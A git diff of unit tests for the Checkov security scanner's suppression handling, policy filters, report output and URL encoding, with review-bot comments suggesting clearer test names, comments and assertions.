+ file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) + + instance.repo_id = 'another/repo' + self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression)) + def test_resource_suppression(self): instance = BcPlatformIntegration() instance.repo_id = 
'org/repo' 
@@ -1013,6 +1122,71 @@ def test_tag_suppression(self): self.assertFalse(suppressions_integration._check_suppression(record4, suppression)) self.assertFalse(suppressions_integration._check_suppression(record5, suppression)) + def test_file_v2_suppression_cli_repo(self): + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + suppression = { + "ruleType": "file", + "files": [ + { + "repositoryName": "1234_org/repo", + "filePath": "test/file.txt" + }, + { + "repositoryName": "1234_org/repo2", + "filePath": "/test/file2.txt" + }, + { + "repositoryName": "1234_not/valid", + "filePath": "/test/file3.txt" + } + ], + "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"], + } + + # this is actually almost the same as a policy check, except we care about the repo name in the integration + # record details do not matter, except policy ID + record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record1.repo_file_path = '/test/file.txt' + record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2.repo_file_path = 'test/file.txt' # should still match despite missing slash + record3 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3.repo_file_path = '/test/file2.txt' + record4 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + 
check_class=None, file_abs_path='.', entity_tags=None) + record4.repo_file_path = 'test/file.txt' + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) # right file, wrong repo + self.assertFalse(suppressions_integration._check_suppression_v2(record4, suppression)) + + record1.repo_file_path = '/test/file2.txt' + record2.repo_file_path = 'test/file2.txt' + instance.repo_id = 'org/repo2' # now check the same thing but with a leading slash in the suppression file + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + + instance.repo_id = 'another/repo' + self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression)) + def test_apply_suppressions_to_report(self): instance = BcPlatformIntegration() @@ -1024,6 +1198,7 @@ def test_apply_suppressions_to_report(self): "policyId": "BC_AWS_GENERAL_31", "comment": "No justification comment provided.", "checkovPolicyId": "CKV_AWS_79", + "isV1": True } suppressions_integration.suppressions = {suppression['checkovPolicyId']: [suppression]} 
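Review bot: The comment `# record details do not matter, except policy ID` was copied from the repository-rule tests into `test_file_v2_suppression_cli_repo`, where it is no longer true: every record is given a `repo_file_path` and the assertions (record3 being "right file, wrong repo", record2 matching without the leading slash) hinge on that field. Replace the two copied lines with `# for the file rule type the policy ID, the repo name and repo_file_path decide the match; the rest of the record is irrelevant`. The second half of the test also mutates `record1`, `record2` and `instance.repo_id` in place before re-asserting, so a failure there cannot be told apart from a regression in the first half; fresh records (or a separate test for the leading-slash case) would keep each assertion self-describing.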
@@ -1065,44 +1240,126 @@ def test_apply_suppressions_to_report(self): self.assertEqual(len(report.passed_checks), 1) self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2') self.assertEqual(len(report.skipped_checks), 2) + self.assertEqual(report.skipped_checks[0].check_result['suppress_comment'], "No justification comment provided.") + + def test_apply_suppressions_to_report_with_v2(self): + instance = BcPlatformIntegration() + + suppressions_integration = SuppressionsIntegration(instance) + + suppression = { + "ruleType": "policy", + "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"], + "isV1": False, + "justificationComment": "comment" + } + + suppressions_integration.suppressions_v2 = {id: [suppression] for id in suppression['checkovPolicyIds']} + + record1 = Record(check_id='CKV_AWS_79', check_name=None, + check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_1', check_name=None, + check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_80', check_name=None, + check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record4 = Record(check_id='CKV_AWS_2', check_name=None, + check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + report = Report('terraform') + report.add_record(record1) + 
report.add_record(record2) + report.add_record(record3) + report.add_record(record4) + + suppressions_integration._apply_suppressions_to_report(report) + self.assertEqual(len(report.failed_checks), 1) + self.assertEqual(report.failed_checks[0].check_id, 'CKV_AWS_1') + self.assertEqual(len(report.passed_checks), 1) + self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2') + # We are omitting policy level suppression + self.assertEqual(len(report.skipped_checks), 0) def test_get_policy_level_suppressions(self): instance = BcPlatformIntegration() suppressions_integration = SuppressionsIntegration(instance) suppressions_integration.suppressions = { - 'CKV_AWS_252': [{'suppressionType': 'Policy', 'id': '404088ed-4251-41ac-8dc1-45264af0c461', + 'CKV_AWS_252': [{'suppressionType': 'Policy', "isV1": True, 'id': '404088ed-4251-41ac-8dc1-45264af0c461', 'policyId': 'BC_AWS_GENERAL_175', 'creationDate': '2022-11-09T16:27:36.413Z', 'comment': 'Test2', 'checkovPolicyId': 'CKV_AWS_252'}], 'CKV_AWS_36': [ - {'suppressionType': 'Policy', 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11', + {'suppressionType': 'Policy', "isV1": True, 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11', 'policyId': 'BC_AWS_LOGGING_2', 'creationDate': '2022-11-09T16:11:58.435Z', 'comment': 'Testing', 'checkovPolicyId': 'CKV_AWS_36'}], 'CKV_K8S_27': [ - {'suppressionType': 'Policy', 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26', + {'suppressionType': 'Policy', "isV1": True, 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26', 'creationDate': '2022-12-08T08:00:04.561Z', 'comment': 'test checkov suppressions', 'checkovPolicyId': 'CKV_K8S_27'}], 'acme_AWS_1668010000289': [ - {'suppressionType': 'Resources', 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1', + {'suppressionType': 'Resources', "isV1": True, 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1', 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.887Z', 'comment': 'Testing', 'resources': 
[{'accountId': 'acme_cli_repo/testing-resources', 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail9'}], 'checkovPolicyId': 'acme_AWS_1668010000289'}, - {'suppressionType': 'Resources', 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267', + {'suppressionType': 'Resources', "isV1": True, 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267', 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.951Z', 'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources', 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail10'}], 'checkovPolicyId': 'acme_AWS_1668010000289'}, - {'suppressionType': 'Resources', 'id': '86d88e69-5755-4e69-965b-f97fc26e784b', + {'suppressionType': 'Resources', "isV1": True, 'id': '86d88e69-5755-4e69-965b-f97fc26e784b', 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.838Z', 'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources', 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail8'}], 'checkovPolicyId': 'acme_AWS_1668010000289'}]} + suppressions_integration.suppressions_v2 = { + "CKV3_SAST_1": [{ + "ruleType": "policy", + "isV1": False, + "id": "1111", + "policyIds": ["BC_SAST_1", "BC_SAST_2"] + }], + "CKV3_SAST_2": [ + { + "ruleType": "policy", + "isV1": False, + "id": "2222", + "policyIds": ["BC_SAST_3", "BC_SAST_2"] + }, + { + "ruleType": "repository", + "isV1": False, + "id": "3333", + "policyIds": ["BC_SAST_1", "BC_SAST_3"] + } + ] + } + expected_suppressions = ['404088ed-4251-41ac-8dc1-45264af0c461', 'b68013bc-2908-4c9a-969d-f1640d4aca11', - '271c1a79-2333-4a12-bf7d-55ec78468b94'] + '271c1a79-2333-4a12-bf7d-55ec78468b94', '1111', '2222'] policy_level_suppressions = suppressions_integration.get_policy_level_suppressions() self.assertEqual(expected_suppressions, list(policy_level_suppressions.keys())) + self.assertEqual(policy_level_suppressions['404088ed-4251-41ac-8dc1-45264af0c461'], ['BC_AWS_GENERAL_175']) + 
self.assertEqual(policy_level_suppressions['b68013bc-2908-4c9a-969d-f1640d4aca11'], ['BC_AWS_LOGGING_2']) + self.assertEqual(policy_level_suppressions['271c1a79-2333-4a12-bf7d-55ec78468b94'], ['BC_K8S_26']) + self.assertEqual(policy_level_suppressions['1111'], ["BC_SAST_1", "BC_SAST_2"]) + self.assertEqual(policy_level_suppressions['2222'], ["BC_SAST_3", "BC_SAST_2"]) if __name__ == '__main__': diff --git a/tests/common/integration_features/test_vulnerabilities_integration.py b/tests/common/integration_features/test_vulnerabilities_integration.py index d38449f6ec3..430530a2294 100644 --- a/tests/common/integration_features/test_vulnerabilities_integration.py +++ b/tests/common/integration_features/test_vulnerabilities_integration.py @@ -58,7 +58,9 @@ def test_full_enrich_cves(self): sast_report: SastReport = SastReport(check_type=CheckType.SAST_JAVASCRIPT, language=SastLanguages.JAVASCRIPT, metadata=None, sast_report=PrismaReport(rule_match={}, errors={}, profiler={}, - run_metadata={}, imports={}, reachability_report={})) + run_metadata={}, imports={}, + reachability_report={}, + skipped_checks_by_file={})) sast_report.sast_imports = sast_imports merged_reports = [sca_report, sast_report] @@ -93,7 +95,9 @@ def test_unsupported_sast_lang(self): sast_report: SastReport = SastReport(check_type=CheckType.SAST_JAVASCRIPT, language=SastLanguages.JAVASCRIPT, metadata=None, sast_report=PrismaReport(rule_match={}, errors={}, profiler={}, - run_metadata={}, imports={}, reachability_report={})) + run_metadata={}, imports={}, + reachability_report={}, + skipped_checks_by_file={})) sast_report.sast_imports = sast_imports merged_reports = [sca_report, sast_report] diff --git a/tests/common/output/test_bom_report.py b/tests/common/output/test_bom_report.py index 19ddb44d5c6..42f4c1b7797 100644 --- a/tests/common/output/test_bom_report.py +++ b/tests/common/output/test_bom_report.py 
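Review bot: `suppressions_integration.suppressions_v2 = {id: [suppression] for id in suppression['checkovPolicyIds']}` in `test_apply_suppressions_to_report_with_v2` shadows the builtin `id` inside the comprehension; `{policy_id: [suppression] for policy_id in suppression['checkovPolicyIds']}` reads the same and avoids the flake8 `A` warning the project selects. The v2 apply test only exercises the `"policy"` rule type, and the assertions show those records leaving the report altogether (failed 1, passed 1, skipped 0), so the `justificationComment` on the suppression is never observed; if repository- or file-type v2 suppressions are meant to land in `skipped_checks` with a `suppress_comment` the way the v1 case just above now asserts, a second v2 case with one of those rule types would pin that path. In `test_get_policy_level_suppressions`, a one-line comment such as `# repository-type suppression 3333 must not be reported as policy-level` next to the `suppressions_v2` fixture would make the absence of `'3333'` from `expected_suppressions` read as deliberate rather than an oversight.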
@@ -41,7 +41,7 @@ def test_iac_csv_output(self, tmp_path: Path): with open(iac_file_path) as file: content = file.readlines() header = content[:1][0] - assert 'Resource,Path,Git Org,Git Repository,Misconfigurations,Severity\n' == header + assert 'Resource,Path,Git Org,Git Repository,Misconfigurations,Severity,Policy title,Guideline\n' == header rows = content[1:] assert 'aws_s3_bucket' in rows[0] diff --git a/tests/common/output/test_cyclonedx_report.py b/tests/common/output/test_cyclonedx_report.py index dd54de44beb..f225fdf640e 100644 --- a/tests/common/output/test_cyclonedx_report.py +++ b/tests/common/output/test_cyclonedx_report.py @@ -141,7 +141,7 @@ def test_sca_packages_cyclonedx_bom(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", @@ -202,7 +202,7 @@ def test_duplicate_sca_packages_cyclonedx_bom(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", diff --git a/tests/common/output/test_get_exit_code.py b/tests/common/output/test_get_exit_code.py index 271579d4d83..d10d97e319e 100644 --- a/tests/common/output/test_get_exit_code.py +++ b/tests/common/output/test_get_exit_code.py @@ -40,7 +40,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( 
@@ -54,7 +54,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( @@ -68,7 +68,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( @@ -82,7 +82,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( @@ -96,7 +96,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( @@ -110,7 +110,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( @@ -124,7 +124,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) report.add_record(Record( @@ -138,7 +138,7 @@ def test_sca_get_exit_code(self): code_block=[], file_line_range=[], evaluations=None, - check_class='checkov.sca_package.scanner.Scanner', + check_class='checkov.sca_package_2.scanner.Scanner', file_abs_path='/requirements.txt' )) 
diff --git a/tests/common/output/test_gitlab_sast_report.py b/tests/common/output/test_gitlab_sast_report.py index 66260885a95..6e28ab919d7 100644 --- a/tests/common/output/test_gitlab_sast_report.py +++ b/tests/common/output/test_gitlab_sast_report.py @@ -84,7 +84,7 @@ def test_sca_package_output(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", @@ -184,7 +184,7 @@ def test_sca_license_output(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" license_statuses = [ { "package_name": "github.com/apparentlymart/go-textseg/v12", diff --git a/tests/common/output/test_sarif_report.py b/tests/common/output/test_sarif_report.py index c93698f3a87..a8e83e6917a 100644 --- a/tests/common/output/test_sarif_report.py +++ b/tests/common/output/test_sarif_report.py @@ -398,7 +398,7 @@ def test_non_url_guideline_link(self): def get_sarif_schema() -> dict[str, Any]: file_name, headers = urllib.request.urlretrieve( - "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Documents/CommitteeSpecifications/2.1.0/sarif-schema-2.1.0.json" + "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json" ) with open(file_name, "r") as file: schema = json.load(file) diff --git a/tests/common/output/test_spdx.py b/tests/common/output/test_spdx.py index d26d3febf68..524e11143e2 100644 --- a/tests/common/output/test_spdx.py +++ b/tests/common/output/test_spdx.py 
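Review bot: The new schema URL in `get_sarif_schema` points at the mutable `main` branch of `oasis-tcs/sarif-spec`, so the JSON schema the SARIF tests validate against can change (or move again, which is exactly what broke the old `master` path) without any change in this repository. Pin the fetch to an immutable ref, e.g. `"https://raw.githubusercontent.com/oasis-tcs/sarif-spec/<PINNED_TAG_OR_COMMIT>/sarif-2.1/schema/sarif-schema-2.1.0.json"` (placeholder to be filled with the commit that holds this schema revision), or vendor the schema file under the test data directory so the suite does not need network access at all. `get_sarif_schema` continues past the end of the hunk, so the handling of the temporary file returned by `urlretrieve` is not visible here.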
@@ -14,7 +14,7 @@ def test_sca_package_output(): # given rootless_file_path = "requirements.txt" file_abs_path = "/path/to/requirements.txt" - check_class = "checkov.sca_package.scanner.Scanner" + check_class = "checkov.sca_package_2.scanner.Scanner" vulnerability_details = { "id": "CVE-2019-19844", "status": "fixed in 3.0.1, 2.2.9, 1.11.27", diff --git a/tests/common/runner_registry/test_runner_registry.py b/tests/common/runner_registry/test_runner_registry.py index a3efec826df..b1789a10c15 100644 --- a/tests/common/runner_registry/test_runner_registry.py +++ b/tests/common/runner_registry/test_runner_registry.py @@ -26,7 +26,6 @@ from checkov.main import DEFAULT_RUNNERS from checkov.runner_filter import RunnerFilter from checkov.sca_package_2.runner import Runner as sca_package_runner_2 -from checkov.sca_package.runner import Runner as sca_package_runner from checkov.terraform.runner import Runner as tf_runner from checkov.bicep.runner import Runner as bicep_runner from checkov.sast.runner import Runner as SastRunner @@ -168,7 +167,7 @@ def test_compact_csv_output(self): with open(iac_file_path) as file: content = file.readlines() header = content[:1][0] - self.assertEqual('Resource,Path,Git Org,Git Repository,Misconfigurations,Severity\n', header) + self.assertEqual('Resource,Path,Git Org,Git Repository,Misconfigurations,Severity,Policy title,Guideline\n', header) rows = content[1:] self.assertIn('aws_s3_bucket', rows[0]) oss_file_path = re.search("Persisting SBOM to (.*oss_packages.csv)", output).group(1) 
@@ -266,12 +265,6 @@ def test_runner_file_filter(self): runner_registry.filter_runners_for_files(['main.tf']) self.assertEqual(set(r.check_type for r in runner_registry.runners), {'terraform', 'secrets'}) - runner_registry = RunnerRegistry( - banner, runner_filter, *DEFAULT_RUNNERS, sca_package_runner() - ) - runner_registry.filter_runners_for_files(['main.tf', 'requirements.txt']) - self.assertEqual(set(r.check_type for r in runner_registry.runners), {'terraform', 'secrets', 'sca_package'}) - runner_registry = RunnerRegistry( banner, runner_filter, *DEFAULT_RUNNERS, sca_package_runner_2() ) diff --git a/tests/common/sca/reachability/test_alias_mapping_creator.py b/tests/common/sca/reachability/test_alias_mapping_creator.py index c1afa0b4193..bf0144717f6 100644 --- a/tests/common/sca/reachability/test_alias_mapping_creator.py +++ b/tests/common/sca/reachability/test_alias_mapping_creator.py @@ -1,5 +1,6 @@ import os from checkov.common.sca.reachability.package_alias_mapping.alias_mapping_creator import AliasMappingCreator +from checkov.common.sca.reachability.package_alias_mapping.nodejs.utils import load_json_with_comments current_dir = os.path.dirname(os.path.realpath(__file__)) 
@@ -27,3 +28,42 @@ def test_alias_mapping_creator(): } } } + +def test_load_json_with_no_comments(): + json_data_with_comments = """ + { + "compilerOptions": { + "paths": { + "@modules/*": ["src/modules/*"], + "@shared/*": ["src/shared/*"] + }, + "declaration": true, + "target": "es2021", + "strict": true /* Enable all strict type-checking options. */, + "noUnusedLocals": false, // off for convenience, enable to enforce cleaner code + "noUnusedParameters": false, // off for convenience, enable to enforce cleaner code + "noImplicitAny": false, // off for convenience, recommended value is true to enforce types and reduce bugs + "forceConsistentCasingInFileNames": true /* Disallow inconsistently-cased references to the same file. */, + "resolveJsonModule": true + }, + "exclude": ["node_modules", "dist"] + } + """ + clean_json = load_json_with_comments(json_data_with_comments) + assert clean_json == { + "compilerOptions": { + "paths": { + "@modules/*": ["src/modules/*"], + "@shared/*": ["src/shared/*"] + }, + "declaration": True, + "target": "es2021", + "strict": True, + "noUnusedLocals": False, + "noUnusedParameters": False, + "noImplicitAny": False, + "forceConsistentCasingInFileNames": True, + "resolveJsonModule": True + }, + "exclude": ["node_modules", "dist"] + } \ No newline at end of file diff --git a/tests/common/test_platform_integration.py b/tests/common/test_platform_integration.py index 003f5b5ce34..c0c6271de6a 100644 --- a/tests/common/test_platform_integration.py +++ b/tests/common/test_platform_integration.py 
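Review bot: The new test is named `test_load_json_with_no_comments` but its input is full of `//` and `/* */` comments and the assertion is that they are stripped; `test_load_json_with_comments` describes what is being checked. The input has no string value that itself contains `//` or `/*` (a URL such as `"homepage": "https://example.com"` is the typical tsconfig/package.json case), so the test cannot tell whether `load_json_with_comments` corrupts such values; adding one such key to both the input and the expected dict would pin that, assuming the stripper is meant to respect string boundaries. Two style nits on the same hunk: only one blank line separates the new function from the previous one where PEP 8 and the project's flake8 `E` selection expect two, and the file now ends without a trailing newline.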
@@ -139,24 +139,35 @@ def test_should_upload(self): def test_run_config_url(self): instance = BcPlatformIntegration() + instance.repo_id = 'owner/repo' instance.bc_api_key = '00000000-0000-0000-0000-000000000000' - self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=bc&enforcementv2=true')) + self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=bc&enforcementv2=true&repoId=owner/repo')) instance.bc_api_key = '00000000-0000-0000-0000-000000000000::1234==' - self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=pc&enforcementv2=true')) + self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=pc&enforcementv2=true&repoId=owner/repo')) + instance.repo_id = 'encode/më' + self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=pc&enforcementv2=true&repoId=encode/m%C3%AB')) def test_is_valid_policy_filter(self): instance = BcPlatformIntegration() instance.bc_api_key = '00000000-0000-0000-0000-000000000000::1234==' instance.customer_run_config_response = mock_customer_run_config() - self.assertTrue(instance.is_valid_policy_filter(policy_filter={'policy.label': 'CODE'}, + self.assertTrue(instance.is_valid_policy_filter(policy_filter=[('policy.label', 'CODE')], valid_filters=mock_prisma_policy_filter_response())) - self.assertFalse(instance.is_valid_policy_filter(policy_filter={'policy.labels': 'CODE'}, + self.assertFalse(instance.is_valid_policy_filter(policy_filter=[('policy.labels', 'CODE')], valid_filters=mock_prisma_policy_filter_response())) - self.assertFalse(instance.is_valid_policy_filter(policy_filter={'policy.label': 'CODE', 'not': 'allowed'}, + self.assertFalse(instance.is_valid_policy_filter(policy_filter=[('policy.label', 'CODE'), ('not', 'allowed')], valid_filters=mock_prisma_policy_filter_response())) - self.assertFalse(instance.is_valid_policy_filter(policy_filter={}, + 
self.assertFalse(instance.is_valid_policy_filter(policy_filter=[], valid_filters=mock_prisma_policy_filter_response())) - self.assertFalse(instance.is_valid_policy_filter(policy_filter={'policy.label': ['A', 'B']}, valid_filters={})) + self.assertFalse(instance.is_valid_policy_filter(policy_filter=[('policy.label', 'A'), ('policy.label', 'B')], valid_filters={})) + + def test_add_static_policy_filters(self): + self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([]), [('policy.enabled', 'true'), ('policy.subtype', 'build')]) + self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.enabled', 'true')]), [('policy.enabled', 'true'), ('policy.subtype', 'build')]) + self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.enabled', 'true'), ('policy.subtype', 'build')]), [('policy.enabled', 'true'), ('policy.subtype', 'build')]) + self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.label', 'xyz')]), [('policy.label', 'xyz'), ('policy.enabled', 'true'), ('policy.subtype', 'build')]) + self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.label', 'xyz'), ('policy.enabled', 'true')]), [('policy.label', 'xyz'), ('policy.enabled', 'true'), ('policy.subtype', 'build')]) + self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.enabled', 'true'), ('policy.label', 'xyz'), ('policy.subtype', 'build')]), [('policy.enabled', 'true'), ('policy.label', 'xyz'), ('policy.subtype', 'build')]) def test_setup_on_prem(self): instance = BcPlatformIntegration() diff --git a/tests/common/test_runner_filter.py b/tests/common/test_runner_filter.py index c53d097b7e1..a39d5613df9 100644 --- a/tests/common/test_runner_filter.py +++ b/tests/common/test_runner_filter.py 
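Review bot: `test_run_config_url` now places the caller-supplied `repo_id` into the query string, and the only encoding case is a non-ASCII letter (`më` → `m%C3%AB`) with the `/` left raw; presumably the implementation quotes with `/` marked safe, but nothing here pins what happens to reserved characters. A case such as `instance.repo_id = 'a&b/c?d'` asserting the `&`, `?` (and `#`, if allowed) arrive percent-encoded would stop a repo id from breaking the query or injecting a second parameter, and a comment `# '/' is intentionally left unencoded in repoId` would document the current expectation. In `test_is_valid_policy_filter`, the duplicate-key case `[('policy.label', 'A'), ('policy.label', 'B')]` is paired with `valid_filters={}`, so it is presumably rejected because no filter is valid at all and the test does not say whether repeated keys are accepted against a real filter list; since the list-of-tuples shape was introduced precisely to allow repeats, a companion case with `mock_prisma_policy_filter_response()` would settle it.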
@@ -445,6 +445,26 @@ def test_should_run_if_no_filtered_policies(self): filtered_policy_ids=[]) self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789')) + def test_should_skip_explicit_run_if_policy_exception(self): + instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False, + filtered_exception_policy_ids=['CKV_AWS_789']) + self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789')) + + def test_should_skip_policy_exception(self): + instance = RunnerFilter(skip_checks=['CKV_AWS_789'], include_all_checkov_policies=False, + filtered_exception_policy_ids=["CKV_AWS_789"]) + self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789')) + + def test_should_run_if_no_policy_exceptions(self): + instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False, + filtered_exception_policy_ids=[]) + self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789')) + + def test_should_skip_if_filtered_policy_is_also_policy_exception(self): + instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False, + filtered_policy_ids=['CKV_AWS_789'], filtered_exception_policy_ids=['CKV_AWS_789']) + self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789')) + def test_should_run_check_enforcement_rules(self): instance = RunnerFilter(include_all_checkov_policies=True, filtered_policy_ids=[], use_enforcement_rules=True) @@ -723,6 +743,8 @@ def test_apply_enforcement_rules(self): 'sast_python': Severities[BcSeverities.OFF], 'sast_java': Severities[BcSeverities.OFF], 'sast_javascript': Severities[BcSeverities.OFF], + 'sast_typescript': Severities[BcSeverities.OFF], + 'sast_golang': Severities[BcSeverities.OFF], } self.assertEqual(instance.enforcement_rule_configs, expected) 
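Review bot: `test_should_skip_policy_exception` passes `skip_checks=['CKV_AWS_789']` together with `filtered_exception_policy_ids=["CKV_AWS_789"]`, so `should_run_check` would return False from the explicit skip alone and the test does not show that the exception list has any effect. Either drop `skip_checks` and follow the shape of the neighbouring tests, `instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False, filtered_exception_policy_ids=['CKV_AWS_789'])`, or give `skip_checks` an unrelated ID so the only reason to skip is the exception; as written it duplicates `test_should_skip_explicit_run_if_policy_exception` with a weaker premise. The quote style also flips between `['CKV_AWS_789']` and `["CKV_AWS_789"]` across the four new tests; the surrounding file uses single quotes.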
